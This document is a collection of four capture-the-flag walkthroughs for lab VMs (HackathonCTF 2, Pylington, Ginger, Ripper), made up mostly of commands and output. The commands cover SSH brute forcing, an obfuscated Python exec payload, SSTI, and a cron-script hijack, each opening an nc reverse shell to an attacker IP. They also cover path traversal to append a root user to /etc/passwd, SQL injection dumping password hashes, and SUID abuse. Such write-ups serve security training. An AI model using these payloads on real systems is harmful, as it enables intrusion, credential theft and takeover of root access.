Vulnhub HackathonCTF: 2 Walkthrough

https://www.vulnhub.com/entry/hackathonctf-2,714/

Difficulty: Easy

Scan ports.

 ~ nmap -sV -sC -p- 192.168.33.140  -oN ports.log            
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 17:17 CST
 Nmap scan report for bogon (192.168.33.140)              
 PORT     STATE SERVICE VERSION
 21/tcp   open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | -rw-r--r--    1 1000     1000           47 Jun 18 17:32 flag1.txt
 |_-rw-r--r--    1 1000     1000          849 Jun 19 05:11 word.dir
 ...
 80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
 | http-robots.txt: 1 disallowed entry                                                 ...
 7223/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
 ...

Get a dic file from ftp.

 ~ ftp 192.168.33.140                                            
 Connected to 192.168.33.140.                                    
 220 (vsFTPd 3.0.3)                                              
 Name (192.168.33.140:kali): anonymous                            
 331 Please specify the password.                                
 Password:                                                        
 230 Login successful.                                            
 Remote system type is UNIX.                                      
 Using binary mode to transfer files.                            
 ftp> ls -la                                                      
 200 PORT command successful. Consider using PASV.                
 150 Here comes the directory listing.                            
 drwxr-xr-x    2 0        118          4096 Jun 19 05:11 .        
 drwxr-xr-x    2 0        118          4096 Jun 19 05:11 ..      
 -rw-r--r--    1 1000     1000           47 Jun 18 17:32 flag1.txt
 -rw-r--r--    1 1000     1000          849 Jun 19 05:11 word.dir
 226 Directory send OK.                                          
 ftp> get word.dir                                                
 local: word.dir remote: word.dir            

Scan folders and files of port 80.

~ gobuster dir -u http://192.168.33.140 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 1254]
 /robots.txt           (Status: 200) [Size: 70]
 /happy                (Status: 200) [Size: 110]          

Visit /happy, check source code, found username hackathonll.

```
~ curl http://192.168.33.140/happy
<html>
<title>happy</title>

<body><h1> Nothing is in here</h1></body>

<!-- username: hackathonll >

</html>

Brute force ssh with this username and the dic file.

~ hydra -l hackathonll -P word.dir 192.168.33.140 -s 7223 ssh -t64 -f
...
[DATA] attacking ssh://192.168.33.140:7223/
[7223][ssh] host: 192.168.33.140 login: hackathonll password: Ti@gO
[STATUS] attack finished for 192.168.33.140 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

Ssh login, check sudo -l.

 ```
~ ssh hackathonll@192.168.33.140 -p 7223
 ...
 $ sudo -l
 Matching Defaults entries for hackathonll on hackathon:
     env_reset, mail_badpass,
 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 User hackathonll may run the following commands on hackathon:
     (root) NOPASSWD: /usr/bin/vim

Sudo run vim, press ":", then input "!/bin/bash", and became root.

$ sudo vim                            

 root@hackathon:/home/hackathonll# id  
 uid=0(root) gid=0(root) groups=0(root)

Vulnhub Pylington: 1 Walkthrough

https://www.vulnhub.com/entry/pylington-1,684/

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                                      
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 8.5 (protocol 2.0)    
 80/tcp open  http    Apache httpd 2.4.46 ((Unix) mod_wsgi/4.7.1 Python/3.9)

Scan port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /register             (Status: 301) [Size: 239] [--> http://192.168.56.100/register/]
 /index.html           (Status: 200) [Size: 4065]                                      
 /assets               (Status: 301) [Size: 237] [--> http://192.168.56.100/assets/]  
 /404.html             (Status: 200) [Size: 3305]                                      
 /robots.txt           (Status: 200) [Size: 83]

Check robots.txt

 ~ cat robots.txt    
 User-agent: *
 Disallow: /register
 Disallow: /login
 Disallow: /zbir7mn240soxhicso2z

Visit /zbir7mn240soxhicso2z, get username and password.

 Username: steve
 Password: bvbkukHAeVxtjjVH

Login, get an python IDE, with some string bypass. Use exec function to get reverse shell.

 strimp='imp'+'ort'+' o'+'s;'
 strcmd='o'+'s.system("nc 192.168.56.150 1234 -e /bin/bash")'
 exec(strimp)
 exec(strcmd)

Get reverse shell.

 ~ nc -nlvp 1234  
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:51044.
 id
 uid=33(http) gid=33(http) groups=33(http)

In home folder of user py, get typing.cc.

 [http@archlinux py]$ ls -la
 ls -la
 total 56
 dr-xr-xr-x 3 py   py    4096 Apr 16 23:41 .
 drwxr-xr-x 3 root root  4096 Apr  7 18:43 ..
 -rw------- 1 py   py      21 Dec 20 18:44 .bash_logout
 -rw------- 1 py   py      57 Dec 20 18:44 .bash_profile
 -rw------- 1 py   py     141 Dec 20 18:44 .bashrc
 -r-------- 1 py   py      11 Apr  9 12:04 password.txt
 drwx------ 2 py   py    4096 Apr  9 19:31 secret_stuff
 -r-sr-xr-x 1 py   py   19216 Apr  9 12:15 typing
 -r--r--r-- 1 py   py     689 Apr  9 12:15 typing.cc
 -r-------- 1 py   py      34 Apr  9 12:32 user.txt

Check source code of typing.cc. Get password of py.

 [http@archlinux py]$ ./typing
 ./typing
 Let's play a game! If you can type the sentence below, then I'll tell you my password.

 the quick brown fox jumps over the lazy dog
 the quick brown fox jumps over the lazy dog
 the quick brown fox jumps over the lazy dog
 54ezhCGaJV

Ssh login as user py, in /home/py/secret_stuff folder, found backup.cc.

[py@archlinux ~]$ cd secret_stuff/
 [py@archlinux secret_stuff]$ ls -la
 total 40
 drwx------ 2 py   py    4096 Apr  9 19:31 .
 dr-xr-xr-x 3 py   py    4096 Apr 16 23:41 ..
 -rwsr-xr-x 1 root root 26128 Apr  9 19:30 backup
 -rw-r--r-- 1 root root   586 Apr  9 19:30 backup.cc
 [py@archlinux secret_stuff]$

Check source code of backup.cc.

```
[py@archlinux secret_stuff]$ cat backup.cc

include <iostream>

include <string>

include <fstream>

int main(){
std::cout<<"Enter a line of text to back up: ";
std::string line;
std::getline(std::cin,line);
std::string path;
std::cout<<"Enter a file to append the text to (must be inside the /srv/backups directory): ";
std::getline(std::cin,path);

 if(!path.starts_with("/srv/backups/")){
     std::cout<<"The file must be inside the /srv/backups directory!\n";
 }
 else{
     std::ofstream backup_file(path,std::ios_base::app);
     backup_file<<line<<'\n';
 }
 return 0;

}

That means we can write new user with root privilege into /etc/passwd.

[py@archlinux secret_stuff]$ ./backup
Enter a line of text to back up: root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash
Enter a file to append the text to (must be inside the /srv/backups directory): /srv/backups/../../etc/passwd
[py@archlinux secret_stuff]$ su root2
Password:
[root@archlinux secret_stuff]# id;uname -a
uid=0(root) gid=0(root) groups=0(root)
Linux archlinux 5.11.11-arch1-1 #1 SMP PREEMPT Tue, 30 Mar 2021 14:10:17 +0000 x86_64 GNU/Linux

HackMyVm Ginger Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Ginger

Find IP of VM.

 ~ sudo arp-scan --interface eth1 192.168.56.0/24                                                         ...
 192.168.56.100  08:00:27:45:72:fc       PCS Systemtechnik GmbH

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
 |   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
 |_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 10701]
 /wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]
 /latest.zip           (Status: 200) [Size: 16866701]

Scan vulnerability of wordpress.

 ~ wpscan --url http://192.168.56.100/wordpress/ -e ap --no-banner --api-token your_wpscan_token --force --plugins-detection aggressive
 ...
 [+] cp-multi-view-calendar
  | Location: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/
  | Last Updated: 2021-03-08T13:47:00.000Z
  | Readme: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txt
  | [!] The version is out of date, the latest version is 1.3.99
  | [!] Directory listing is enabled
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/, status: 200
  |
  | [!] 2 vulnerabilities identified:
  |
  | [!] Title: CP Multi View Event Calendar <= 1.1.4 - SQL Injection & XSS
  |     Fixed in: 1.1.5
  |     References:
  |      - https://wpscan.com/vulnerability/50db43be-9fdb-4b5f-bba5-4c0d62689dbf
  |      - https://www.exploit-db.com/exploits/36243/
  |      - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli/
  |
  | [!] Title: CP Multi View Event Calendar <= 1.1.7 - Unauthenticated SQL Injection
  |     Fixed in: 1.1.8
  |     References:
  |      - https://wpscan.com/vulnerability/3bf2665d-2e2d-4cc4-ac5d-7300e9cb1c11
  |      - https://www.exploit-db.com/exploits/37560/
  |
  | Version: 1.0.2 (50% confidence)
  | Found By: Readme - ChangeLog Section (Aggressive Detection)
  |  - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txt

Seach the exploit in exploitdb.

~ searchsploit CP Multi View Event Calendar                                                       fish-0 | 0 [14:21:49]
 ------------------------------------------------------------------------------------- ---------------------------------
  Exploit Title                                                                       |  Path                           ------------------------------------------------------------------------------------- ---------------------------------
 WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection                   | php/webapps/35073.txt          
 WordPress Plugin CP Multi View Event Calendar 1.1.7 - SQL Injection                  | php/webapps/37560.txt          
 ------------------------------------------------------------------------------------- ---------------------------------

Check 37560.txt, find the sql injection point, and use sqlmap to dump database.

 ~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1'  -p id --risk 3 --level 5 --dbs --batch
 ...
 available databases [2]:
 [*] information_schema
 [*] wordpress_db
 ~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1'  -p id --risk 3 --level 5  -D wordpress_db -T wp_users --dump
 ...
 Table: wp_users
 [1 entry]
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
 | ID | user_url                      | user_pass                          | user_email          | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
 | 1  | http://192.168.0.14/wordpress | $P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr. | webmaster@gmail.com | webmaster  | 0           | webmaster    | webmaster     | 2021-06-02 05:28:40 | <blank>             |
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+

Crack the password hash with john the ripper.

 ~ john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt
 ~ john --show hash.txt            
 ?:sanitarium

Login wordpress with webmaster:sanitarium, in plugin editor, modify akismet.php, insert shell code.

image-20210609142750078.png

Visit the shell code and get reverse shell.

```
~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php

~ nc -nvlp 1234 ...
Ncat: Connection from 192.168.56.100:34762.
Linux ginger 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
08:28:31 up 14 min, 0 users, load average: 0.00, 0.05, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

 Found 3 users in /home.

www-data@ginger:/home$ ls -la
ls -la
total 20
drwxr-xr-x 5 root root 4096 May 21 16:30 .
drwxr-xr-x 18 root root 4096 May 19 10:09 ..
drwxr-xr-- 5 caroline webmaster 4096 May 25 08:15 caroline
drwxr-xr-x 4 sabrina sabrina 4096 May 25 08:15 sabrina
drwx------ 4 webmaster webmaster 4096 May 25 08:15 webmaster

 Found hint of sabrina.

www-data@ginger:/home/sabrina$ cat password.txt
cat password.txt
I forgot my password again...
I wrote it down somewhere in this form: sabrina:password
but I don't know where... I have to search in my memory

Get the password through dmesg.

www-data@ginger:/home/sabrina$ dmesg |grep sabrina
dmesg |grep sabrina
[ 6.040104] sabrina:dontforgetyourpasswordbitch

Log in ssh as sabrina, check sudo -l.

sabrina@ginger:~$ sudo -l
Matching Defaults entries for sabrina on ginger:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sabrina may run the following commands on ginger:
(webmaster) NOPASSWD: /usr/bin/python /opt/app.py *

Check app.py, it's http server with SSTI on port 5000.

 ```
sabrina@ginger:~$ cat /opt/app.py

 from flask import Flask, request, render_template_string,render_template

 app = Flask(__name__)
 @app.route('/')
 def hello_ssti():
     person = {'name':"world",'secret':"UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg=="}
     if request.args.get('name'):
         person['name'] = request.args.get('name')
     template = '''<h2>Hello %s!</h2>''' % person['name']
     return render_template_string(template,person=person)
 def get_user_file(f_name):
     with open(f_name) as f:
         return f.readlines()
 app.jinja_env.globals['get_user_file'] = get_user_file

 if __name__ == "__main__":
     app.run(debug=True)

Start the server as webmaster.

sabrina@ginger:~$ sudo -u webmaster python /opt/app.py *
  * Serving Flask app "app" (lazy loading)
  * Environment: production
    WARNING: This is a development server. Do not use it in a production deployment.
    Use a production WSGI server instead.
  * Debug mode: on
  * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
  * Restarting with stat
  * Debugger is active!
  * Debugger PIN: 260-511-262

In another terminal, use ssh to port forward port 5000.

 ~ ssh -L 5000:127.0.0.1:5000 sabrina@192.168.56.100

Visit the server with SSTI shell code.

```
127.0.0.1:5000/?name={{request.application.globals.builtins.import(%27os%27).popen('nc 192.168.56.150 1234 -e /bin/bash').read()}}

At the same time, use nc to listen to specific port, and get reverse shell as webmaster.

~ nc -nlvp 1234 fish-0 | 0 [14:34:52]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:34772.
id
uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)

Upload id_rsa.pub to /home/webmaster/.ssh, change name to authorized_keys and chmod 600.

 ```
webmaster@ginger:/home/sabrina$ cd /home/webmaster
 cd /home/webmaster
 webmaster@ginger:~$ mkdir .ssh
 mkdir .ssh
 webmaster@ginger:~$ cd .ssh
 cd .ssh
 webmaster@ginger:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
 ...
 Saving to: ‘authorized_keys’
 authorized_keys     100%[===================>]     565  --.-KB/s    in 0s    
 webmaster@ginger:~/.ssh$ chmod 600 authorized_keys
 chmod 600 authorized_keys

Now we can login ssh as webmaster

~ ssh webmaster@192.168.56.100  
 ...
 webmaster@ginger:~$ id
 uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)

Upload pspy64 to VM and check it.

```
2021/06/09 04:33:01 CMD: UID=1002 PID=883 | /bin/sh -c bash ~/backup/backup.sh
2021/06/09 04:33:01 CMD: UID=1002 PID=884 | bash /home/caroline/backup/backup.sh

UID 1002 is user caroline, and the /home/backup folder is writable to webmaster.

drwxrwx--- 2 caroline webmaster 4096 May 22 13:38 backup

Write bash code into /home/caroine/backup/backup.sh.

 ```
webmaster@ginger:/home/caroline$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /tmp/backup.sh
 webmaster@ginger:/home/caroline$ rm backup/backup.sh          
 rm: remove write-protected regular file 'backup/backup.sh'? yes
 webmaster@ginger:/home/caroline$ cp /tmp/backup.sh backup/    

Then we get reverse shell as caroline. Again, upload id_rsa.pub and get ssh access. Check sudo -l.

caroline@ginger:~$ sudo -l
 Matching Defaults entries for caroline on ginger:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User caroline may run the following commands on ginger:
     (ALL : ALL) NOPASSWD: /srv/code

Disassemble code, it just calls chmod to make passwd writable in 5 seconds.

```
int __cdecl main(int argc, const char argv, const char envp)
{
system("chmod o+w /etc/passwd ; sleep 5 ; chmod o-w /etc/passwd");
return 0;
}

In 5 seconds, we write a new root user with password hash into file /etc/passwd.

caroline@ginger:/srv$ sudo /srv/code &
[1] 1220
caroline@ginger:/srv$ echo "root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash" >> /etc/passwd
caroline@ginger:/srv$ su root2
Password:
root@ginger:/srv# id;hostname
uid=0(root) gid=0(root) groups=0(root)
ginger
root@ginger:/srv#

HackMyVm Ripper Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Ripper

Scan ports.

 nmap -sV -sC -p- 192.168.56.100  -oN ports.log
 ...
 PORT   STATE SERVICE VERSION            
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 ...
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 57]
 /staff_statements.txt (Status: 200) [Size: 107]

Check staff_statements.txt. Old ssh connection files may mean id_rsa.bak.

```
cat staff_statements.txt
The site is not yet repaired. Technicians are working on it by connecting with old ssh connection files.

Take care the screen of VM told us the user name jack.

image-20210603115519124.png

Download id_rsa.bak, try to connect ssh, it's encrypted.

wget http://192.168.56.100/id_rsa.bak
2021-06-03 11:53:15 (126 MB/s) - ‘id_rsa.bak’ saved [1876/1876]

ssh jack@192.168.56.100 -i id_rsa.bak
Enter passphrase for key 'id_rsa.bak':

Use following code to brute force password.

cat /usr/share/wordlists/rock_ascii.txt | while read pass; do if ssh-keygen -c -C “jack@192.168.56.100” -P $pass -f id_rsa.bak &>/dev/null; then echo $pass; break; fi; done
bananas

Login as jack. After some enum, found nothing useful.

Download linpeas from github. Upload to VM.

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

Run linpeas.sh, get a strange string.

[+] Hashes inside passwd file? ........... No
[+] Writable passwd file? ................ No
[+] Credentials in fstab/mtab? ........... No
[+] Can I read shadow files? ............. No
[+] Can I read opasswd file? ............. jack:Il0V3lipt0n1c3t3a
[+] Can I write in network-scripts? ...... No
[+] Can I read root folder? .............. No

It's the password of another user helder.

Download pspy64 from github(https://github.com/DominicBreuker/pspy), upload to VM, check system process.

2021/06/02 08:22:01 CMD: UID=0 PID=1205 | /usr/sbin/CRON -f
2021/06/02 08:22:01 CMD: UID=0 PID=1206 | /usr/sbin/CRON -f
2021/06/02 08:22:01 CMD: UID=0 PID=1207 | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi

The bash code means, if /root/.local/helder.txt is equal to /home/helder/passwd.txt, then we can send a string (like XXX) to port 10000, and system will set SUID bit of /usr/bin/XXX.

So we make a symbolic link, and send port 10000 string "bash". After a minute, /usr/bin/bash has been set SUID.

helder@ripper:~$ln -s /root/.local/helder.txt ./passwd.txt
helder@ripper:~$echo bash |nc -nlvp 10000
listening on [any] 10000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43374
helder@ripper:~$ls -la /usr/bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /usr/bin/bash

Get root finally.

 ```
helder@ripper:~$/usr/bin/bash -p
 helder@ripper:~$id
 uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder)